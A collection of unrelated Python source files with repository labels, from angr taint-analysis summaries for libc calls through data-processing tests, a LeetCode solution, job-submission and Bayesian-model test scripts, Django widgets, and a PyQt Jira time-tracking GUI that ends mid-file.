plt (i.e., call_site.step()) :return: None """ fname = _get_function_name(plt_path.active[0].addr, _core.p) sim_size = None if fname == 'malloc': sim_size = _malloc(_core, call_site_path, plt_path) elif fname == 'realloc': sim_size = _realloc(_core, call_site_path, plt_path) else: print(f"Implement this heap alloc: {fname}") if sim_size is not None: taint_args = [l for l in sim_size.recursive_leaf_asts if _core.is_tainted(l, call_site_path)] if taint_args and len(set(taint_args)) == 1: arg = taint_args[0] if is_size_taint(arg): _core.do_recursive_untaint(arg, plt_path) # # Env function # env_var = {} def _setenv(_core, _, plt_path): """ setenv function summary :param _core: core taint engine :param plt_path: path to the plt (i.e., call_site.step()) :return: None """ global env_var p = _core.p plt_path_cp = plt_path.copy(deep=True) plt_state_cp = plt_path_cp.active[0] # add the environment variable to the list of env_variables with this key key = getattr(plt_path.active[0].regs, arg_reg_name(p, 0)) env_var[str(key)] = getattr(plt_path.active[0].regs, arg_reg_name(p, 1)) # this call can continue with an empty sim procedure since it does nothing next_state = plt_state_cp.step() _core.p.hook(next_state.addr, ReturnUnconstrained()) plt_path.step().step() def _getenv(_core, call_site_addr, plt_path): """ getenv function summary :param _core: core taint engine :param call_site_addr: call site angr path :param plt_path: path to the plt (i.e., call_site.step()) :return: None """ global env_var p = _core.p env_var_size = _core.taint_buf_size reg = getattr(plt_path.active[0].regs, arg_reg_name(p, 0)) cnt_mem = _core.safe_load(plt_path, reg) key = str(reg) # this info is passed by some user controllable source if _core.is_tainted(reg, path=plt_path) or _core.is_tainted(cnt_mem, path=plt_path): to_store = _core.get_sym_val(name=_core.taint_buf, bits=env_var_size) # it was set before elif key in env_var: to_store = env_var[key] # fresh symbolic var else: to_store = _core.get_sym_val(name="env_var", bits=env_var_size) # store the symbolic buffer at the memory address addr = plt_path.active[0].heap.allocate(env_var_size) plt_path.active[0].memory.store(addr, to_store) # use an empty hook as sim procedure to continue with the program plt_path_cp = plt_path.copy(deep=True) plt_state_cp = plt_path_cp.active[0] next_state = plt_state_cp.step() _core.p.hook(next_state.addr, ReturnUnconstrained()) plt_path.step().step() # set the return address to the pointer setattr(plt_path.active[0].regs, ret_reg_name(p), addr) def env(_core, call_site_path, plt_path): """ Summarize environment functions (getenv, and setenv) :param _core: core taint engin :param call_site_path: call site angr path :param plt_path: path to the plt (i.e., call_site.step()) :return: """ fname = _get_function_name(plt_path.active[0].addr, _core.p) if fname == 'setenv': _setenv(_core, call_site_path, plt_path) elif fname == 'getenv': _getenv(_core, call_site_path, plt_path) else: print(f"Implement this Env function: {fname}") # return the env_var if tainted to store for bug_finders # # Numerical # def atoi(_core, _, plt_path): p = _core.p state = plt_path.active[0] val = getattr(state.regs, arg_reg_name(p, 0)) if _core.is_or_points_to_tainted_data(val, plt_path): addr = plt_path.active[0].memory.load(val, p.arch.bytes) _core.do_recursive_untaint(addr, plt_path) plt_path.step().step()
kenlm_training/tests/test_minify.py
ruinunca/data_tooling
435
30404
# Copyright (c) Facebook, Inc. and its affiliates. # # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. # import json from pathlib import Path import pytest import cc_net import cc_net.minify as minify from cc_net import jsonql, process_wet_file from cc_net.minify import ( HASH_SIZE, decode_hashes, encode_hashes, encode_line_ids, get_hashes, ) def test_encode_decode(): sentences = ["Hello world !", "Is everyone happy in here ?"] hashes = get_hashes(sentences) assert all([len(h) == HASH_SIZE for h in hashes]) hashes_int = [minify._b2i(h) for h in hashes] encoded = encode_hashes(hashes) decoded = decode_hashes(encoded) assert all([len(d) == HASH_SIZE for d in decoded]) decoded_int = [minify._b2i(d) for d in decoded] assert hashes_int == decoded_int assert hashes == decoded def test_minify(): doc = { "raw_content": "Hello world !\nIs everyone happy in here ?", "language": "en", "perplexity": 120.0, "line_ids": [0, 4], } expected = {"line_ids": "AAAEAA==", "language": "en", "perplexity": 120.0} minifier = minify.Minifier() assert expected == minifier(doc) @pytest.fixture def http_from_disk(monkeypatch): def read_sample_file(url: str, n_retry: int = 3) -> bytes: expected_url = process_wet_file.WET_URL_ROOT + "/crawl-data/sample.warc.wet" assert expected_url == url file = Path(__file__).parent / "data" / "sample.warc.txt" return file.read_bytes() monkeypatch.setattr(cc_net.jsonql, "request_get_content", read_sample_file) def test_minify_and_fetch(http_from_disk, tmp_path: Path): full_quotes = """Don't part with your illusions. When they are gone you may still exist, but you have ceased to live. Education: that which reveals to the wise, and conceals from the stupid, the vast limits of their knowledge. Facts are stubborn things, but statistics are more pliable. Fiction is obliged to stick to possibilities. Truth isn't.""" # We don't need no education. chosen_quotes = "\n".join( l for l in full_quotes.splitlines() if "Education" not in l ) cc_doc = { "url": "http://sample_english.com", "date_download": "2019-03-18T00:00:00Z", "digest": "sha1:XQZHW7QWIG54HVAV3KPRW6MK5ILDNCER", "source_domain": "sample_english.com", "title": "Famous Mark Twain Quotes", "raw_content": full_quotes, "cc_segment": "crawl-data/sample.warc.wet", "nlines": 4, "length": 353, } ccnet_metadata = { "language": "en", "language_score": 0.99, "perplexity": 151.5, "bucket": "head", "raw_content": chosen_quotes, "nlines": 3, "length": len(chosen_quotes), "original_nlines": 4, "original_length": 353, "line_ids": [0, 2, 3], } ccnet_doc = dict(cc_doc, **ccnet_metadata) mini = minify.Minifier()(ccnet_doc.copy()) assert mini is not ccnet_doc important_fields = [ "url", "digest", "cc_segment", "language", "language_score", "perplexity", "bucket", "line_ids", ] expected = {k: ccnet_doc[k] for k in important_fields} expected["line_ids"] = encode_line_ids(expected["line_ids"]) # type: ignore assert expected == mini with jsonql.open_write(tmp_path / "sample.json") as o: print(json.dumps(mini), file=o) fetcher = minify.MetadataFetcher(tmp_path) # line_ids is removed when unminifying ccnet_doc.pop("line_ids") assert ccnet_doc == fetcher(cc_doc) def test_fetch(http_from_disk, tmp_path: Path): mini_docs = [ { "url": "http://sample_chinese.com", "digest": "sha1:Y4E6URVYGIAFNVRTPZ5S3J64RTZTP6HJ", "cc_segment": "crawl-data/sample.warc.wet", "line_ids": encode_line_ids([2]), "bucket": "not_that_great", }, { "url": "http://sample_english.com", "digest": "sha1:XQZHW7QWIG54HVAV3KPRW6MK5ILDNCER", "cc_segment": "crawl-data/sample.warc.wet", "line_ids": encode_line_ids([3]), "bucket": "top_notch", }, ] with jsonql.open_write(tmp_path / "sample.json") as o: for mini in mini_docs: print(json.dumps(mini), file=o) fetcher = minify.MetadataFetcher(tmp_path) cc = process_wet_file.CCSegmentsReader(["crawl-data/sample.warc.wet"]) docs = [d for d in fetcher.map(cc) if d is not None] assert cc.retrieved_segments == 1 # Note: documents are retrieved as they are ordered in the .warc.wet file assert [ "Facts are stubborn things, but statistics are more pliable.", "事實是固執的東西,但統計數字卻比較柔和。", ] == [d["raw_content"] for d in docs] assert ["top_notch", "not_that_great"] == [d["bucket"] for d in docs]
python/091-100/Interleaving String.py
KaiyuWei/leetcode
150
30416
<reponame>KaiyuWei/leetcode<filename>python/091-100/Interleaving String.py class Solution: # @param {string} s1 # @param {string} s2 # @param {string} s3 # @return {boolean} def isInterleave(self, s1, s2, s3): m = len(s1) n = len(s2) if m+n != len(s3): return False table = [([False] * (m+1)) for i in range(n+1)] table[0][0] = True for i in range (1, m+1): if s3[i-1] == s1[i-1] and table[0][i-1] == True: table[0][i] = True for i in range (1, n+1): if s3[i-1] == s2[i-1] and table[i-1][0] == True: table[i][0] = True for i in range (1, n+1): for j in range(1, m+1): if s3[i+j-1] == s2[i-1] and table[i-1][j] == True: table[i][j] = True if s3[i+j-1] == s1[j-1] and table[i][j-1] == True: table[i][j] = True return table[n][m]
scripts/job/memcached_submit.py
Container-Projects/firmament
287
30425
from base import job_desc_pb2 from base import task_desc_pb2 from base import reference_desc_pb2 from google.protobuf import text_format import httplib, urllib, re, sys, random import binascii import time import shlex def add_worker_task(job_name, task, binary, args, worker_id, num_workers, extra_args): task.uid = 0 task.name = "%s/%d" % (job_name, worker_id) task.state = task_desc_pb2.TaskDescriptor.CREATED task.binary = "/usr/bin/python" task.args.extend(args) task.args.append(str(worker_id)) task.args.append(str(num_workers)) task.args.append(binary) task.args.extend(extra_args) task.inject_task_lib = True if len(sys.argv) < 4: print "usage: memcached_submit.py <coordinator hostname> <web UI port> " \ "<task binary> [<args>] [<num workers>] [<job name>]" sys.exit(1) hostname = sys.argv[1] port = int(sys.argv[2]) memcached_exe = sys.argv[3] if len(sys.argv) > 4: extra_args = shlex.split(sys.argv[4]) else: extra_args = [] if len(sys.argv) > 5: num_workers = int(sys.argv[5]) else: num_workers = 1 if len(sys.argv) > 6: job_name = sys.argv[6] else: job_name = "memcached_job_at_%d" % (int(time.time())) basic_args = [] basic_args.append("/home/srguser/firmament-experiments/helpers/napper/napper_memcached.py") basic_args.append("caelum-301:2181") basic_args.append(job_name) job_desc = job_desc_pb2.JobDescriptor() job_desc.uuid = "" # UUID will be set automatically on submission job_desc.name = job_name # set up root task job_desc.root_task.uid = 0 job_desc.root_task.name = job_name + "/0" job_desc.root_task.state = task_desc_pb2.TaskDescriptor.CREATED job_desc.root_task.binary = "/usr/bin/python" job_desc.root_task.args.extend(basic_args) job_desc.root_task.args.append("0") # root task is worker ID 0 job_desc.root_task.args.append(str(num_workers)) job_desc.root_task.args.append(memcached_exe) job_desc.root_task.args.extend(extra_args) job_desc.root_task.inject_task_lib = True # add workers for i in range(1, num_workers): task = job_desc.root_task.spawned.add() add_worker_task(job_name, task, memcached_exe, basic_args, i, num_workers, extra_args) input_id = binascii.unhexlify('feedcafedeadbeeffeedcafedeadbeeffeedcafedeadbeeffeedcafedeadbeef') output_id = binascii.unhexlify('db33daba280d8e68eea6e490723b02cedb33daba280d8e68eea6e490723b02ce') output2_id = binascii.unhexlify('feedcafedeadbeeffeedcafedeadbeeffeedcafedeadbeeffeedcafedeadbeef') job_desc.output_ids.append(output_id) job_desc.output_ids.append(output2_id) input_desc = job_desc.root_task.dependencies.add() input_desc.id = input_id input_desc.scope = reference_desc_pb2.ReferenceDescriptor.PUBLIC input_desc.type = reference_desc_pb2.ReferenceDescriptor.CONCRETE input_desc.non_deterministic = False input_desc.location = "blob:/tmp/fib_in" final_output_desc = job_desc.root_task.outputs.add() final_output_desc.id = output_id final_output_desc.scope = reference_desc_pb2.ReferenceDescriptor.PUBLIC final_output_desc.type = reference_desc_pb2.ReferenceDescriptor.FUTURE final_output_desc.non_deterministic = True final_output_desc.location = "blob:/tmp/out1" final_output2_desc = job_desc.root_task.outputs.add() final_output2_desc.id = output2_id final_output2_desc.scope = reference_desc_pb2.ReferenceDescriptor.PUBLIC final_output2_desc.type = reference_desc_pb2.ReferenceDescriptor.FUTURE final_output2_desc.non_deterministic = True final_output2_desc.location = "blob:/tmp/out2" #params = urllib.urlencode({'test': text_format.MessageToString(job_desc)}) params = 'jd=%s' % text_format.MessageToString(job_desc) print "SUBMITTING job with parameters:" print params print "" try: headers = {"Content-type": "application/x-www-form-urlencoded"} conn = httplib.HTTPConnection("%s:%s" % (hostname, port)) conn.request("POST", "/job/submit/", params, headers) response = conn.getresponse() except Exception as e: print "ERROR connecting to coordinator: %s" % (e) sys.exit(1) data = response.read() match = re.search(r"([0-9a-f\-]+)", data, re.MULTILINE | re.S | re.I | re.U) print "----------------------------------------------" if match and response.status == 200: job_id = match.group(1) print "JOB SUBMITTED successfully!\nJOB ID is %s\nStatus page: " \ "http://%s:%d/job/status/?id=%s" % (job_id, hostname, port, job_id) else: print "ERROR submitting job -- response was: %s (Code %d)" % (response.reason, response.status) print "----------------------------------------------" conn.close()
refinery/bnpy/bnpy-dev/tests/merge/TestMergeHDPTopicModel.py
csa0001/Refinery
103
30478
''' Unit tests for MergeMove.py for HDPTopicModels Verification merging works as expected and produces valid models. Attributes ------------ self.Data : K=4 simple WordsData object from AbstractBaseTestForHDP self.hmodel : K=4 simple bnpy model from AbstractBaseTestForHDP Coverage ----------- * run_many_merge_moves * fails to merge away any true comps * successfully merges away all duplicated comps when chosen randomly * successfully merges away all duplicated comps when chosen via marglik * run_merge_move * fails to merge away any true comps * successfully merges away all duplicated comps when targeted specifically * successfully merges away all duplicated comps when chosen randomly * successfully merges away all duplicated comps when chosen via marglik success rate > 95% ''' import numpy as np import unittest from AbstractBaseTestForHDP import AbstractBaseTestForHDP import bnpy from bnpy.learnalg import MergeMove from scipy.special import digamma import copy class TestMergeHDP(AbstractBaseTestForHDP): def getSuffStatsPrepForMerge(self, hmodel): ''' With merge flats ENABLED, run Estep, calc suff stats, then do an Mstep ''' LP = hmodel.calc_local_params(self.Data) flagDict = dict(doPrecompEntropy=True, doPrecompMergeEntropy=True) SS = hmodel.get_global_suff_stats(self.Data, LP, **flagDict) hmodel.update_global_params(SS) return LP, SS ######################################################### Test many moves ######################################################### def test_run_many_merge_moves_trueModel_random(self): LP, SS = self.getSuffStatsPrepForMerge(self.hmodel) PRNG = np.random.RandomState(0) mergeKwArgs = dict(mergename='random') a, b, c, MTracker = MergeMove.run_many_merge_moves(self.hmodel, self.Data, SS, nMergeTrials=100, randstate=PRNG, **mergeKwArgs) assert MTracker.nTrial == SS.K * (SS.K-1)/2 assert MTracker.nSuccess == 0 def test_run_many_merge_moves_dupModel_random(self): self.MakeModelWithDuplicatedComps() LP, SS = self.getSuffStatsPrepForMerge(self.dupModel) PRNG = np.random.RandomState(0) mergeKwArgs = dict(mergename='random') a, b, c, MTracker = MergeMove.run_many_merge_moves(self.dupModel, self.Data, SS, nMergeTrials=100, randstate=PRNG, **mergeKwArgs) assert MTracker.nSuccess == 4 assert (0,4) in MTracker.acceptedOrigIDs assert (1,5) in MTracker.acceptedOrigIDs assert (2,6) in MTracker.acceptedOrigIDs assert (3,7) in MTracker.acceptedOrigIDs def test_run_many_merge_moves_dupModel_marglik(self): self.MakeModelWithDuplicatedComps() LP, SS = self.getSuffStatsPrepForMerge(self.dupModel) PRNG = np.random.RandomState(456) mergeKwArgs = dict(mergename='marglik') a, b, c, MTracker = MergeMove.run_many_merge_moves(self.dupModel, self.Data, SS, nMergeTrials=100, randstate=PRNG, **mergeKwArgs) for msg in MTracker.InfoLog: print msg assert MTracker.nSuccess == 4 assert MTracker.nTrial == 4 assert (0,4) in MTracker.acceptedOrigIDs assert (1,5) in MTracker.acceptedOrigIDs assert (2,6) in MTracker.acceptedOrigIDs assert (3,7) in MTracker.acceptedOrigIDs ######################################################### run_merge_move ######################################################### full tests def test_model_matches_ground_truth_as_precheck(self): ''' Verify HDPmodel is able to learn ground truth parameters and maintain stable estimates after several E/M steps ''' np.set_printoptions(precision=3,suppress=True) # Advance the model several iterations for rr in range(5): self.run_Estep_then_Mstep() for k in range(self.hmodel.obsModel.K): logtopicWordHat = self.hmodel.obsModel.comp[k].Elogphi topicWordHat = np.exp(logtopicWordHat) diffVec = np.abs(topicWordHat - self.Data.TrueParams['topics'][k]) print diffVec print ' ' assert np.max(diffVec) < 0.04 ######################################################### run_merge_move ######################################################### full tests def test_run_merge_move_on_true_comps_fails(self): ''' Should not be able to merge "true" components into one another Each is necessary to explain (some) data ''' mergeFlags = dict(doPrecompEntropy=True, doPrecompMergeEntropy=True) LP = self.hmodel.calc_local_params(self.Data) SS = self.hmodel.get_global_suff_stats(self.Data, LP, **mergeFlags) for trial in range(10): newModel, newSS, newEv, MoveInfo = MergeMove.run_merge_move(self.hmodel, self.Data, SS, mergename='random') assert newModel.allocModel.K == self.hmodel.allocModel.K assert newModel.obsModel.K == self.hmodel.obsModel.K def test_run_merge_move_on_dup_comps_succeeds_with_each_ideal_pair(self): ''' Given the duplicated comps model, which has a redundant copy of each "true" component, We show that deliberately merging each pair does succeed. This is "ideal" since we know in advance which merge pair to try ''' self.MakeModelWithDuplicatedComps() mergeFlags = dict(doPrecompEntropy=True, doPrecompMergeEntropy=True) LP = self.dupModel.calc_local_params(self.Data) SS = self.dupModel.get_global_suff_stats(self.Data, LP, **mergeFlags) for kA in [0,1,2,3]: kB = kA + 4 # Ktrue=4, so kA's best match is kA+4 newModel, newSS, newEv, MoveInfo = MergeMove.run_merge_move(self.dupModel, self.Data, SS, kA=kA, kB=kB) print MoveInfo['msg'] assert newModel.allocModel.K == self.dupModel.allocModel.K - 1 assert newModel.obsModel.K == self.dupModel.obsModel.K - 1 assert MoveInfo['didAccept'] == 1 def test_run_merge_move_on_dup_comps_fails_with_nonideal_pairs(self): ''' Given the duplicated comps model, which has a redundant copy of each "true" component, We show that deliberately merging each pair does succeed. This is "ideal" since we know in advance which merge pair to try ''' self.MakeModelWithDuplicatedComps() mergeFlags = dict(doPrecompEntropy=True, doPrecompMergeEntropy=True) LP = self.dupModel.calc_local_params(self.Data) SS = self.dupModel.get_global_suff_stats(self.Data, LP, **mergeFlags) for Kstep in [1,2,3,5,6,7]: for kA in range(8 - Kstep): kB = kA + Kstep newM, newSS, newEv, MoveInfo = MergeMove.run_merge_move(self.dupModel, self.Data, SS, kA=kA, kB=kB) print MoveInfo['msg'] assert MoveInfo['didAccept'] == 0 def test_run_merge_move_on_dup_comps_succeeds_with_all_ideal_pairs(self): self.MakeModelWithDuplicatedComps() mergeFlags = dict(doPrecompEntropy=True, doPrecompMergeEntropy=True) LP = self.dupModel.calc_local_params(self.Data) SS = self.dupModel.get_global_suff_stats(self.Data, LP, **mergeFlags) myModel = self.dupModel.copy() for kA in [3,2,1,0]: # descend backwards so indexing still works kB = kA + 4 # Ktrue=4, so kA's best match is kA+4 myModel, SS, newEv, MoveInfo = MergeMove.run_merge_move(myModel, self.Data, SS, kA=kA, kB=kB) print MoveInfo['msg'] assert MoveInfo['didAccept'] == 1 def test_run_merge_move_on_dup_comps_succeeds_with_random_choice(self): ''' Consider Duplicated Comps model. Out of (8 choose 2) = 28 possible pairs, exactly 4 produce sensible merges. Verify that over many random trials where kA,kB drawn uniformly, we obtain a success rate not too different from 4 / 28 = 0.142857 ''' self.MakeModelWithDuplicatedComps() mergeFlags = dict(doPrecompEntropy=True, doPrecompMergeEntropy=True) LP = self.dupModel.calc_local_params(self.Data) SS = self.dupModel.get_global_suff_stats(self.Data, LP, **mergeFlags) nTrial = 100 nSuccess = 0 PRNG = np.random.RandomState(0) for trial in range(nTrial): newModel, newSS, newEv, MoveInfo = MergeMove.run_merge_move(self.dupModel, self.Data, SS, mergename='random', randstate=PRNG) if MoveInfo['didAccept']: print MoveInfo['msg'] nSuccess += 1 assert nSuccess > 0 rate = float(nSuccess)/float(nTrial) print "Expected rate: .1428" print "Measured rate: %.3f" % (rate) assert rate > 0.1 assert rate < 0.2 def test_run_merge_move_on_dup_comps_succeeds_with_marglik_choice(self): ''' Consider Duplicated Comps model. Use marglik criteria to select candidates kA, kB. Verify that the merge accept rate is much higher than at random. The accept rate should actually be near perfect! ''' self.MakeModelWithDuplicatedComps() mergeFlags = dict(doPrecompEntropy=True, doPrecompMergeEntropy=True) LP = self.dupModel.calc_local_params(self.Data) SS = self.dupModel.get_global_suff_stats(self.Data, LP, **mergeFlags) nTrial = 100 nSuccess = 0 PRNG = np.random.RandomState(0) for trial in range(nTrial): newModel, newSS, newEv, MoveInfo = MergeMove.run_merge_move(self.dupModel, self.Data, SS, mergename='marglik', randstate=PRNG) print MoveInfo['msg'] if MoveInfo['didAccept']: nSuccess += 1 assert nSuccess > 0 rate = float(nSuccess)/float(nTrial) print "Expected rate: >.95" print "Measured rate: %.3f" % (rate) assert rate > 0.95
test/run/t242.py
timmartin/skulpt
2,671
30498
class O(object): pass class A(O): pass class B(O): pass class C(O): pass class D(O): pass class E(O): pass class K1(A,B,C): pass class K2(D,B,E): pass class K3(D,A): pass class Z(K1,K2,K3): pass print K1.__mro__ print K2.__mro__ print K3.__mro__ print Z.__mro__
tests/cases/infer.py
div72/py2many
345
30502
<filename>tests/cases/infer.py #!/usr/bin/env python3 def foo(): a = 10 # infer that b is an int b = a assert b == 10 print(b) if __name__ == "__main__": foo()
fnss/traffic/__init__.py
brucespang/fnss
114
30520
"""Tools for creating and manipulating event schedules and traffic matrices""" from fnss.traffic.eventscheduling import * from fnss.traffic.trafficmatrices import *
djng/forms/widgets.py
ParikhKadam/django-angular
941
30522
import mimetypes from django.contrib.staticfiles.storage import staticfiles_storage from django.core import signing from django.forms import widgets from django.forms.utils import flatatt from django.utils.safestring import mark_safe from django.utils.html import format_html from django.utils.translation import ugettext_lazy as _ from djng import app_settings class DropFileWidget(widgets.Widget): signer = signing.Signer() def __init__(self, area_label, fileupload_url, attrs=None): self.area_label = area_label self.fileupload_url = fileupload_url super(DropFileWidget, self).__init__(attrs) self.filetype = 'file' def render(self, name, value, attrs=None, renderer=None): from django.contrib.staticfiles.storage import staticfiles_storage extra_attrs = dict(attrs) extra_attrs.update({ 'name': name, 'class': 'djng-{}-uploader'.format(self.filetype), 'djng-fileupload-url': self.fileupload_url, 'ngf-drop': 'uploadFile($file, "{0}", "{id}", "{ng-model}")'.format(self.filetype, **attrs), 'ngf-select': 'uploadFile($file, "{0}", "{id}", "{ng-model}")'.format(self.filetype, **attrs), }) self.update_attributes(extra_attrs, value) final_attrs = self.build_attrs(self.attrs, extra_attrs=extra_attrs) elements = [format_html('<textarea {}>{}</textarea>', flatatt(final_attrs), self.area_label)] # add a spinnging wheel spinner_attrs = { 'class': 'glyphicon glyphicon-refresh glyphicon-spin', 'ng-cloak': True, } elements.append(format_html('<span {}></span>', flatatt(spinner_attrs))) # add a delete icon icon_attrs = { 'src': staticfiles_storage.url('djng/icons/{}/trash.svg'.format(self.filetype)), 'class': 'djng-btn-trash', 'title': _("Delete File"), 'djng-fileupload-button ': True, 'ng-click': 'deleteImage("{id}", "{ng-model}")'.format(**attrs), 'ng-cloak': True, } elements.append(format_html('<img {} />', flatatt(icon_attrs))) # add a download icon if value: download_attrs = { 'href': value.url, 'class': 'djng-btn-download', 'title': _("Download File"), 'download': True, 'ng-cloak': True, } download_icon = staticfiles_storage.url('djng/icons/{}/download.svg'.format(self.filetype)) elements.append(format_html('<a {}><img src="{}" /></a>', flatatt(download_attrs), download_icon)) return format_html('<div class="drop-box">{}</div>', mark_safe(''.join(elements))) def update_attributes(self, attrs, value): if value: try: content_type, _ = mimetypes.guess_type(value.file.name) extension = mimetypes.guess_extension(content_type)[1:] except (IOError, IndexError, TypeError): extension = '_blank' background_url = staticfiles_storage.url('djng/icons/{}.png'.format(extension)) attrs.update({ 'style': 'background-image: url({});'.format(background_url), 'current-file': self.signer.sign(value.name) }) class DropImageWidget(DropFileWidget): def __init__(self, area_label, fileupload_url, attrs=None): super(DropImageWidget, self).__init__(area_label, fileupload_url, attrs=attrs) self.filetype = 'image' def update_attributes(self, attrs, value): if value: background_url = self.get_background_url(value) if background_url: attrs.update({ 'style': 'background-image: url({});'.format(background_url), 'current-file': self.signer.sign(value.name) }) def get_background_url(self, value): from easy_thumbnails.exceptions import InvalidImageFormatError from easy_thumbnails.files import get_thumbnailer try: thumbnailer = get_thumbnailer(value) thumbnail = thumbnailer.get_thumbnail(app_settings.THUMBNAIL_OPTIONS) return thumbnail.url except InvalidImageFormatError: return
parse_jira_logged_time/gui.py
gil9red/SimplePyScripts
117
30525
<gh_stars>100-1000 #!/usr/bin/env python3 # -*- coding: utf-8 -*- __author__ = 'ipetrash' import json import io import sys import traceback import webbrowser from contextlib import redirect_stdout from datetime import datetime from PyQt5.Qt import ( QApplication, QMessageBox, QThread, pyqtSignal, QMainWindow, QPushButton, QCheckBox, QPlainTextEdit, QVBoxLayout, QHBoxLayout, QTextOption, QTableWidget, QWidget, QSizePolicy, QSplitter, Qt, QTableWidgetItem, QProgressDialog, QHeaderView, QSystemTrayIcon, QIcon, QEvent, QTimer ) from main import ( DIR, get_rss_jira_log, parse_logged_dict, get_logged_list_by_now_utc_date, get_logged_total_seconds, get_sorted_logged, seconds_to_str ) def log_uncaught_exceptions(ex_cls, ex, tb): text = f'{ex_cls.__name__}: {ex}:\n' text += ''.join(traceback.format_tb(tb)) print(text) QMessageBox.critical(None, 'Error', text) sys.exit(1) sys.excepthook = log_uncaught_exceptions class RunFuncThread(QThread): run_finished = pyqtSignal(object) def __init__(self, func): super().__init__() self.func = func def run(self): self.run_finished.emit(self.func()) WINDOW_TITLE = 'parse_jira_logged_time' class MainWindow(QMainWindow): def __init__(self): super().__init__() self.setWindowTitle(WINDOW_TITLE) file_name = str(DIR / 'favicon.ico') icon = QIcon(file_name) self.setWindowIcon(icon) self.tray = QSystemTrayIcon(icon) self.tray.setToolTip(self.windowTitle()) self.tray.activated.connect(self._on_tray_activated) self.tray.show() self.logged_dict = dict() self.pb_refresh = QPushButton('REFRESH') self.pb_refresh.clicked.connect(self.refresh) self.cb_show_log = QCheckBox() self.cb_show_log.setChecked(True) self.log = QPlainTextEdit() self.log.setReadOnly(True) self.log.setWordWrapMode(QTextOption.NoWrap) log_font = self.log.font() log_font.setFamily('Courier New') self.log.setFont(log_font) self.cb_show_log.clicked.connect(self.log.setVisible) self.log.setVisible(self.cb_show_log.isChecked()) header_labels = ['DATE', 'TOTAL LOGGED TIME'] self.table_logged = QTableWidget() self.table_logged.setEditTriggers(QTableWidget.NoEditTriggers) self.table_logged.setSelectionBehavior(QTableWidget.SelectRows) self.table_logged.setSelectionMode(QTableWidget.SingleSelection) self.table_logged.setColumnCount(len(header_labels)) self.table_logged.setHorizontalHeaderLabels(header_labels) self.table_logged.horizontalHeader().setStretchLastSection(True) self.table_logged.itemClicked.connect(self._on_table_logged_item_clicked) header_labels = ['TIME', 'LOGGED', 'JIRA'] self.table_logged_info = QTableWidget() self.table_logged_info.setEditTriggers(QTableWidget.NoEditTriggers) self.table_logged_info.setSelectionBehavior(QTableWidget.SelectRows) self.table_logged_info.setSelectionMode(QTableWidget.SingleSelection) self.table_logged_info.setColumnCount(len(header_labels)) self.table_logged_info.setHorizontalHeaderLabels(header_labels) self.table_logged_info.horizontalHeader().setSectionResizeMode(1, QHeaderView.ResizeToContents) self.table_logged_info.horizontalHeader().setStretchLastSection(True) self.table_logged_info.itemDoubleClicked.connect(self._on_table_logged_info_item_double_clicked) main_layout = QVBoxLayout() central_widget = QWidget() central_widget.setLayout(main_layout) self.setCentralWidget(central_widget) self.pb_refresh.setSizePolicy(QSizePolicy(QSizePolicy.Expanding, QSizePolicy.Preferred)) h_layout = QHBoxLayout() h_layout.addWidget(self.pb_refresh) h_layout.addWidget(self.cb_show_log) layout_table_widget = QVBoxLayout() layout_table_widget.setContentsMargins(0, 0, 0, 0) layout_table_widget.addWidget(self.table_logged) layout_table_widget.addWidget(self.table_logged_info) table_widget = QWidget() table_widget.setLayout(layout_table_widget) splitter = QSplitter(Qt.Horizontal) splitter.addWidget(table_widget) splitter.addWidget(self.log) main_layout.addLayout(h_layout) main_layout.addWidget(splitter) def _fill_tables(self, xml_data: bytes): buffer_io = io.StringIO() try: with redirect_stdout(buffer_io): print(len(xml_data), repr(xml_data[:50])) # Структура документа -- xml self.logged_dict = parse_logged_dict(xml_data) print(self.logged_dict) if not self.logged_dict: return print(json.dumps(self.logged_dict, indent=4, ensure_ascii=False)) print() logged_list = get_logged_list_by_now_utc_date(self.logged_dict) logged_total_seconds = get_logged_total_seconds(logged_list) logged_total_seconds_str = seconds_to_str(logged_total_seconds) print('entry_logged_list:', logged_list) print('today seconds:', logged_total_seconds) print('today time:', logged_total_seconds_str) print() # Для красоты выводим результат в табличном виде lines = [] # Удаление строк таблицы while self.table_logged.rowCount(): self.table_logged.removeRow(0) for i, (date_str, logged_list) in enumerate(get_sorted_logged(self.logged_dict)): total_seconds = get_logged_total_seconds(logged_list) total_seconds_str = seconds_to_str(total_seconds) row = date_str, total_seconds_str, total_seconds lines.append(row) self.table_logged.setRowCount(self.table_logged.rowCount() + 1) self.table_logged.setItem(i, 0, QTableWidgetItem(date_str)) item = QTableWidgetItem(total_seconds_str) item.setToolTip('Total seconds: {}'.format(total_seconds)) self.table_logged.setItem(i, 1, item) self.table_logged.setCurrentCell(0, 0) self.table_logged.setFocus() self._on_table_logged_item_clicked(self.table_logged.currentItem()) # Список строк станет списком столбцов, у каждого столбца подсчитается максимальная длина max_len_columns = [max(map(len, map(str, col))) for col in zip(*lines)] # Создание строки форматирования: [30, 14, 5] -> "{:<30} | {:<14} | {:<5}" my_table_format = ' | '.join('{:<%s}' % max_len for max_len in max_len_columns) for line in lines: print(my_table_format.format(*line)) finally: text = buffer_io.getvalue() self.log.setPlainText(text) print(text) def refresh(self): progress_dialog = QProgressDialog(self) thread = RunFuncThread(func=get_rss_jira_log) thread.run_finished.connect(self._fill_tables) thread.run_finished.connect(progress_dialog.close) thread.start() progress_dialog.setWindowTitle('Please wait...') progress_dialog.setLabelText(progress_dialog.windowTitle()) progress_dialog.setRange(0, 0) progress_dialog.exec() self.setWindowTitle(WINDOW_TITLE + ". Last refresh date: " + datetime.now().strftime('%d/%m/%Y %H:%M:%S')) def _on_table_logged_item_clicked(self, item: QTableWidgetItem): # Удаление строк таблицы while self.table_logged_info.rowCount(): self.table_logged_info.removeRow(0) row = item.row() date_str = self.table_logged.item(row, 0).text() logged_list = self.logged_dict[date_str] logged_list = reversed(logged_list) for i, logged in enumerate(logged_list): self.table_logged_info.setRowCount(self.table_logged_info.rowCount() + 1) self.table_logged_info.setItem(i, 0, QTableWidgetItem(logged['time'])) self.table_logged_info.setItem(i, 1, QTableWidgetItem(logged['logged_human_time'])) item = QTableWidgetItem(logged['jira_id']) item.setToolTip(logged['jira_title']) self.table_logged_info.setItem(i, 2, item) def _on_table_logged_info_item_double_clicked(self, item: QTableWidgetItem): row = item.row() jira_id = self.table_logged_info.item(row, 2).text() url = 'https://jira.compassplus.ru/browse/' + jira_id webbrowser.open(url) def _on_tray_activated(self, reason): self.setVisible(not self.isVisible()) if self.isVisible(): self.showNormal() self.activateWindow() def changeEvent(self, event: QEvent): if event.type() == QEvent.WindowStateChange: # Если окно свернули if self.isMinimized(): # Прячем окно с панели 